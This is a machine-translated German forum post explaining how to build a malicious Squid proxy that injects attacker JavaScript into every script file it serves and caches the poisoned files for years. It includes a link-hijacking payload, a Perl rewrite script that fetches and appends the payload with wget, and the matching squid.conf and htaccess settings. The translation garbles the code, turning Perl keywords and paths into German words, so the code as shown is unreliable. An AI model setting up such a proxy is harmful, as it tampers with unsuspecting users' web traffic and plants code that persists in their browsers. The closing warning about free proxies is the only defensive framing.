Dieser Beitrag wurde zuletzt von Mo Xiaowen am 07.06.2015 um 23:19 bearbeitet
Dies kann durch einfache Änderung der Konfiguration von SQUID erreicht werden
Was ist SQUID?
Squid ist eine Software, die Internetdaten zwischenspeichert, Download-Anfragen von Nutzern erhält und die heruntergeladenen Daten automatisch verarbeitet. Wenn ein Nutzer eine Startseite herunterladen möchte, kann er eine Anfrage an Squid senden, Squid bitten, sie in seinem Namen herunterzuladen, dann verbindet sich Squid mit der Website, fordert die Startseite an und sendet die Startseite an den Nutzer, während er ein Backup führt; wenn andere Nutzer sich für dieselbe Seite bewerben, sendet Squid das gespeicherte Backup sofort an den Nutzer, sodass der Nutzer das Gefühl hat, die Geschwindigkeit sei ziemlich hoch. Squid kann Protokolle wie HTTP, FTP, GOPHER, SSL und WAIS proxyen, und Squid kann das automatisch handhaben, und du kannst Squid entsprechend deinen Bedürfnissen einrichten, um unerwünschte Dinge herauszufiltern.
Squid kann in vielen Betriebssystemen funktionieren, wie AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 usw.
Die Umsetzung ist sehr einfach:
1. Installiere Squid auf einem Linux-Server.
2. Den Code des Servers ändern, einen Teil unseres Codes in alle gesendeten Javascrip einfügen und ihn aussenden.
3. Die Cache-Zeit unserer modifizierten JS-Datei so hoch wie möglich einstellen.
Diese Methode gilt auch für Websites mit aktiviertem SSL: Wenn die Website eine unsichere Ressource lädt (wie jquery für eine HTTP-Seite), geben die meisten Browser eine Warnung, aber nur wenige schenken dem Beachtung.
Chema sagte, dass mehr als 5.000 Menschen seinen Proxy ein paar Tage nach seiner Veröffentlichung nutzten, und die meisten nutzten ihn, um schlechte Dinge zu tun, weil sie den Proxy nutzten, also dachten sie, er sei anonym und sicher, aber sie hätten nie erwartet, dass der Proxy-Server auch schlechte Dinge tun würde.
Erstelle deinen bösartigen Proxy-Server
Wenn Sie bereits einen Squid-Proxy-Server haben, benötigen Sie auch einen Webserver wie Apache.
Schritt 1: Erstellen Sie eine Nutzlast
Ich verwende ein einfaches Skript als Demonstration, um alle Hyperlinks auf meine Website zu verweisen.
/etc/squid/payload.js
[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Schritt 2: Schreibe ein Skript, um alle JS-Dateien zu infizieren.
/etc/squid/poison.pl
[mw_shl_code=perl, wahr]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
während(<>)
{
Chomp $_;
if($_ =- /(.*.js)/i)
{
$url = 1 $;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
System("chmod O+R /VAR/www/TMP/$pid-$count.js");
System("Katze /etc/Tintenfisch/payload.js >> /VAR/www/tmp/$pid-$count.js");
drucken Sie "http://127.0.0.1:80/tmp/$pid-$count.js";
}
oder
{
drucken Sie "$_";
}
$count++;
}[/mw_shl_code]
Dieses Skript verwendet wget, um den ursprünglichen Javascrip der Seite zu erhalten und die t-Datei zu entfernen, dann den Code in /etc/squid/payload.js hinzuzufügen und die modifizierte Datei an den Client zu senden, während du das /var/www/tmp-Verzeichnis erstellen und squid erlauben musst, darin Dateien zu schreiben. Dieses Verzeichnis speichert die modifizierten js-Dateien.
Schritt 3: Kombiniere das obige Skript mit Squid
Füge es in /etc/squid/squid.conf hinzu
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Schritt 4: Sorgt dafür, dass der Cache niemals fehlschlägt
/var/www/tmp/.htaccess
[mw_shl_code=html,wahr] Gültig am
AblaufStandardmäßig "Zugriff plus 3000 Tage"[/mw_shl_code]
Das sagt Apache, ihm eine lange Ablaufzeit zu geben, bis der Nutzer seinen Cache bereinigt hat.
Wenn du diesen Proxy verbindest, wirst du durch einen Hyperlink auf meine Website weitergeleitet, und der Cache bleibt bestehen, auch wenn du den Proxy später nicht mehr benutzt. Ich habe einfach eine nicht-aggressive Nutzlast verwendet, und mit dieser Methode können Hacker viel mehr erreichen. Erinnere dich und Freunde also daran, vorsichtig zu sein, wenn du kostenlose Proxys benutzt.
|
Veröffentlicht am 19.01.2015 02:34:56
|
|
|
|
Veröffentlicht am 19.01.2015 08:48:45
|
Vermieter|
Veröffentlicht am 20.01.2015 14:36:06
|
